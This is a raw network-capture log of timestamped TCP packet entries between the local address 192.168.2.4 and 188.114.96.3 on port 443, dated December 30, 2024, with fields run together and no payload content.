                                                                  Dec 30, 2024 22:42:40.579174042 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.579237938 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.579260111 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.579267025 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.579309940 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.625317097 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.625415087 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.625641108 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.625699043 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.625715971 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.625722885 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.625747919 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.625772953 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.626363039 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.626384974 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.626429081 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.626434088 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.626470089 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.626493931 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.626720905 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.626740932 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.626812935 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.626817942 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.626859903 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.627527952 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.627549887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.627593994 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.627602100 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.627633095 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.627665997 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.630630970 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.630650997 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.630712032 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.630717993 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.630745888 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.630763054 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.631364107 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.631385088 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.631438971 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.631443024 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.631472111 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.631494045 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.631845951 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.631881952 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.631917953 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.631922007 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.631956100 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.631979942 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.661762953 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.662019014 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.662040949 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.662324905 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.662722111 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.662770987 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.662776947 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.662786961 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.708156109 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.713712931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.713737011 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.713824034 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.713839054 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.713880062 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.713943958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.713964939 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714015961 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714020967 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714063883 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714303970 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714327097 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714364052 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714369059 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714400053 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714416981 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714560032 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714579105 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714637995 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714644909 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714684010 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714891911 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714911938 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714951038 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.714956999 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.714983940 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715003014 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715171099 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715285063 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715306997 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715347052 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715356112 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715383053 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715401888 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715663910 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715676069 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715681076 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715683937 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715724945 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715728998 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.715758085 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715778112 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.715985060 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.716133118 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.716152906 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.716193914 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.716200113 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.716229916 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.716250896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.716584921 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.716625929 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.717058897 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.721385956 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.721566916 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.721575975 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.722428083 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.722486973 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.722783089 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.722837925 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.722920895 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.722920895 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.722930908 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.763330936 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.763336897 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.770481110 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.778816938 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.779036999 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.779063940 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.779938936 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.780003071 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.780553102 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.780610085 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.780750036 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.780762911 CET44358521188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.785943985 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.786140919 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.786168098 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.787054062 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.787130117 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.787457943 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.787520885 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.787585974 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.787599087 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802544117 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802565098 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802659988 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.802670002 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802710056 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.802814960 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802834034 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802872896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.802876949 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.802906990 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.802928925 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803154945 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803178072 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803215981 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803220034 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803255081 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803278923 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803442955 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803462982 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803534031 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803539038 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803585052 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803770065 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803792000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803829908 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803833961 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.803864002 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.803884029 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.804212093 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.804230928 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.804277897 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.804281950 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.804315090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.804336071 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.804563999 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.804584980 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.804655075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.804660082 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.804687977 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.804711103 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.806857109 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.806878090 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.806925058 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.806930065 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.806957960 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.806978941 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.832907915 CET58521443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.832928896 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.832959890 CET44358520188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.878563881 CET58520443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.891519070 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.891550064 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.891701937 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.891721964 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.891741991 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.891782045 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.891830921 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.891985893 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892005920 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892045975 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.892050982 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892079115 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.892471075 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892493010 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892525911 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.892529964 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892565966 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.892632008 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892649889 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892680883 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.892684937 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892716885 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.892963886 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.892992973 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893026114 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.893029928 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893064976 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.893322945 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893341064 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893412113 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.893418074 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893563986 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893589020 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893624067 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.893630028 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.893661976 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.911294937 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.911406040 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.911468029 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.912705898 CET58517443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.912728071 CET44358517188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.915234089 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.915297031 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.915374041 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.915575027 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.915597916 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.944396973 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.978089094 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.978183985 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.978240013 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.978985071 CET58518443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.979000092 CET44358518188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980320930 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980345964 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980393887 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980400085 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980457067 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980531931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980551958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980595112 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980600119 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980609894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980650902 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980815887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980838060 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980875969 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980882883 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.980911970 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.980931997 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981157064 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981177092 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981218100 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981221914 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981275082 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981291056 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981431961 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981451035 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981496096 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981499910 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981533051 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981553078 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981873035 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981894016 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981935978 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981942892 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.981971979 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.981991053 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982075930 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982094049 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982130051 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982134104 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982162952 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982187033 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982283115 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982311964 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982346058 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982366085 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982368946 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982403994 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982409000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.982430935 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982455969 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982592106 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982903957 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.982916117 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.986920118 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.987003088 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.987046003 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.987632036 CET58519443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.987642050 CET44358519188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.989420891 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.989455938 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:40.989523888 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.989697933 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:40.989710093 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069180965 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069211006 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069327116 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069346905 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069399118 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069415092 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069434881 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069478035 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069483995 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069524050 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069545031 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069626093 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069653034 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069688082 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069693089 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069730043 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069750071 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069926977 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069947958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.069988012 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.069993973 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070024014 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070044041 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070205927 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070225954 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070271015 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070276976 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070307016 CET58509443192.168.2.4188.114.96.3
